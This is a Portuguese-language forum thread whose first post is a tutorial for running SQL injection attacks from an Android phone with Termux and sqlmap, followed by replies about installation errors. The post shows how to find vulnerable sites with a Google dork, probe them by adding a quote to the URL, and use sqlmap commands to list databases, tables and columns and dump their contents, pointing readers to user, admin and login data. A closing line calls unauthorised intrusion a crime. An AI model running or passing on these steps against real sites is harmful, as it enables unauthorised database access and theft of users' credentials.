Ir para conteúdo
ja1_

[MOBILE HACKING #1] SQL injecton pelo celular

Recommended Posts

Olá haskers, dboa?

Esse e o primeiro post da serie "mobile hacking", que vai ser uma serie onde eu ensino a fazer diversos ataques utilizando o celular

chega do verde

Bom vou responder primeiro a algumas possíveis perguntas:

1 - Vou poder fazer isso no meu iPhone / Windows Phone?

Poder você até pode, mas eu não vou ensinar aqui (:D), tudo que eu for passar nessa serie é limitado ao Android, por ser Linux Based (Não me venha com: "mas WP é windows", se disser isso eu te haskeio). Então se você for usuário de outro sistema que não seja o Android e está muito interessado em hackear pelo celular, adquira um, se precisar de ajuda na escolha sinta-se livre para me mandar uma mensagem :D

 

2 - Ah mas você só vai me ensinar a mexer no terminal ou fazer coisas que eu já sei fazer no Desktop só que pelo celular??

Sim, mas não é tão simples quanto parece, diversos requerimentos pra rodar alguns scripts (como libs por exemplo) não estão presentes no Android nativamente, vou ensinar como "instalar" tais requerimentos para poder utilizar dos scripts...

 

3 - Eu preciso ter root no meu celular??

Nesse primeiro tutorial não, mas nos próximos sim, pois iremos trabalhar com a edição de pastas do sistema do Android que vem nativamente bloqueadas e só podem ser acessadas após o root.

 

4 - Eu vou conseguir fazer o que o Elliot fez na serie na parte da delegacia?

Sim, mas eu vou segurar bastante esse tutorial :3

 

Bom vamos ao tutorial

Recomendo bastante atenção, um movimento errado e seu celular pode virar uma mini ogiva nuclear de alta potencia e gerar uma grande devastação... (fecha essas pornografia aí)

 

Vamos precisar dos seguintes apps:

 

Termux:

https://play.google.com/store/apps/details?id=com.termux&hl=pt_BR

 

Termux:API (para ter acesso ao APT)

https://play.google.com/store/apps/details?id=com.termux.api&hl=pt_BR

 

Observação: O Termux só está disponível para os celulares com versão 5.0 ou superior do Android, caso não esteja nessa versão mais queira tentar do mesmo jeito utilize esse app : https://play.google.com/store/apps/details?id=com.gnuroot.debian&hl=pt_BR  (Podem haver alguns erros durante o procedimento, comenta aí que eu ajudo)

 

E por ultimo o meu preferido por causa do nome

Hacker's Keyboard

https://play.google.com/store/apps/details?id=org.pocketworkstation.pckeyboard&hl=pt_BR

É um teclado comum que possui coisas de um teclado de Desktop como Shift, Tab e outros...

 

Vamos aos procedimentos

Após instalar tudo da lista acima, abra o Termux

e digite:

apt update

pode acontecer de ele dizer que o apt ainda não foi instalado, mas aí você digita isso:

apt install apt

(É sério '-')

 

depois de "ativar" o nosso amigo apt, iremos instalar o python

digite:

apt install python

e depois

apt install python3

(para futuros tutoriais)

 

Agora que temos o Pitão, vamos descolar aquele SQLmap deliciouser

no termux digite:

apt install git

 

depois, vamos clonar o Rep do Sqlmap

digite:

git clone https://github.com/sqlmapproject/sqlmap.git

 

quando o download terminar e você for capaz comandar esse cavalo silvestre que chamamos de terminal

digite:

cd sqlmap-master

 

e pronto, se você já souber fazer ataques SQLi você já tem tudo necessário.

caso não saiba aqui vai um quick tutorial (tutorial rápido em coreano)...

 

Digite:

python sqlmap.py

Só pra ter certeza que está tudo ok.

 

Depois selecione um site alvo (não tente google plmds)

uma dork pra achar alvos é essa: "inurl: php?id=", Joga isso no google que é sucesso

Para saber se um site pode ou não ser vulnerável adicione uma aspa no final da url, por exemplo

sitedopao.com.br/index.php?id=101

você coloca uma aspa no final

sitedopao.com.br/index.php?id=101'

e dá enter

Se der algum erro de php, há uma chance de vulnerabilidade...

 

Voltando ao termux

Digite:

python sqlmap.py -u sitedopao.com.br/index.php?id=101 --dbs

Esse "-u" é pra determinar que o que vem a seguir é a url do site a ser explorado

o "-dbs" é pra determinar o que  você quer que o SQLmap faça, nesse caso --dbs é para testar o site e trazer o nome das DB's nele presente

 

Depois digite:

python sqlmap.py -u sitedopao.com.br/index.php?id=101 -D "nome da DB vem aqui" --tables

Esse "-D" é pra determinar que o que vem a seguir é a Database a ser explorada

o "--tables" é para testar o site e trazer o nome das tables que estão na DB

 

And after that, type:

python sqlmap.py -u sitedopao.com.br/index.php?id=101 -D "nome da DB" -T "nome da tabela" --columns 

Esse "-T" define a tabela da DB a ser explorada

o "--columns" é pra determinar que você quer saber as colunas presentes nessa tabela

 

e por ultimo:

python sqlmap.py -u sitedopao.com.br/index.php?id=101 -D "nome da DB" -T "nome da tabela" -C "nome da coluna" --dump 

o "--dump" é pro SQLmap tentar trazer o conteúdo das tabelas

**** Para pegar o conteúdo de múltiplas tabelas e só colocar "-C tabela1,tabela2,tabela3(...)tabela8008" ****

 

Se você for ixpertinho vai procurar coisas que tenham "user", "admin", "login" e tals

Mas como sempre eu tenho que te lembrar que invadir sites assim é crime, faça isso com permissão do dono do site ou procure um site de testes como por exemplo o http://testphp.vulnweb.com/

Não me responsabilizo pelos seus atos ;)

 

Então é isso guys, acho que amanhã saí o "Aventuras de um hasker #1" e o Mobile Hacking #2

Me digam o que acharam!! avaliem e deem criticas....

 

flws

~~ Bjs do Ja1

Compartilhar este post


Link para o post
Compartilhar em outros sites

quando eu dou o comando "cd sqlmap-master" da "no such file or directory"

e quando eu dou o comando "python sqlmap.py" da a mesma coisa (Errno 2)

sabe como eu arrumo isso?

 

Você manja de terminal?

Compartilhar este post


Link para o post
Compartilhar em outros sites

quando eu dou o comando "cd sqlmap-master" da "no such file or directory"

e quando eu dou o comando "python sqlmap.py" da a mesma coisa (Errno 2)

sabe como eu arrumo isso?

 

Você manja de terminal?

 

Não, mas eu sei q Ta faltando o diretório. Não sei como arruma isso

 

Man antes de continuar recomendo que se aprofunde um pouco no básico, até te ajudo se quiser ::D   Mas sem isso não dá


Man o meu no primeiro comando já deu apt:not found

 

Man, você instalou a API?

Compartilhar este post


Link para o post
Compartilhar em outros sites

Opa boa tarde JAUM, achei muito bom a iniciativa espero que continue no mesmo formado, ficou ótimo :)

Então é o seguinte, fiz as etapas de boa mas chegou no $ cd sqlmap-master ele retorna com um bash: no much file or directory .

Screenshot_Termux_20180221-173349.png

Compartilhar este post


Link para o post
Compartilhar em outros sites
Opa boa tarde JAUM, achei muito bom a iniciativa espero que continue no mesmo formado, ficou ótimo

Então é o seguinte, fiz as etapas de boa mas chegou no $ cd sqlmap-master ele retorna com um bash: no much file or directory .
Screenshot_Termux_20180221-173349.thumb.png.c3136cf5cbe3a6eab219a8bbcdfc02ab.png
Consegui instalar a versão python2, não sei pq a 3 não da (pelo menos no meu).

Enviado de meu Moto G Play usando Tapatalk

Compartilhar este post


Link para o post
Compartilhar em outros sites
Em 22/02/2018 em 10:04, Darcos disse:

Consegui instalar a versão python2, não sei pq a 3 não da (pelo menos no meu).

Enviado de meu Moto G Play usando Tapatalk
 

no meu também apenas funfa o python2, uso o Lenovo Vibe B

Compartilhar este post


Link para o post
Compartilhar em outros sites
Em 22/02/2018 em 10:04, Darcos disse:

Consegui instalar a versão python2, não sei pq a 3 não da (pelo menos no meu).

Enviado de meu Moto G Play usando Tapatalk
 

Cara como tu resolveu esse bash? Não tô conseguindo também com o mesmo problema

Compartilhar este post


Link para o post
Compartilhar em outros sites
Em 30/10/2016 em 21:08, ja1_ disse:

 

Man antes de continuar recomendo que se aprofunde um pouco no básico, até te ajudo se quiser ::D   Mas sem isso não dá

 


 

 

Man, você instalou a API?

Jão, esse no such file or directory é pq o nome da pasta do Sqlmap mudou, não é mais aquele "Sqlmap-master" 

agora é só Sqlmap mesmo

edita no artigo pra galera iniciante não se passar

Compartilhar este post


Link para o post
Compartilhar em outros sites
Em 29/10/2016 em 23:24, ja1_ disse:

Quando vou usar o comando pra   executar a invasão, diz que a minha versão é 3.8 e pra  funcionar precisa ser a versao 2.6 me  ajuda  porfavorrrrr 

 

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora

×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.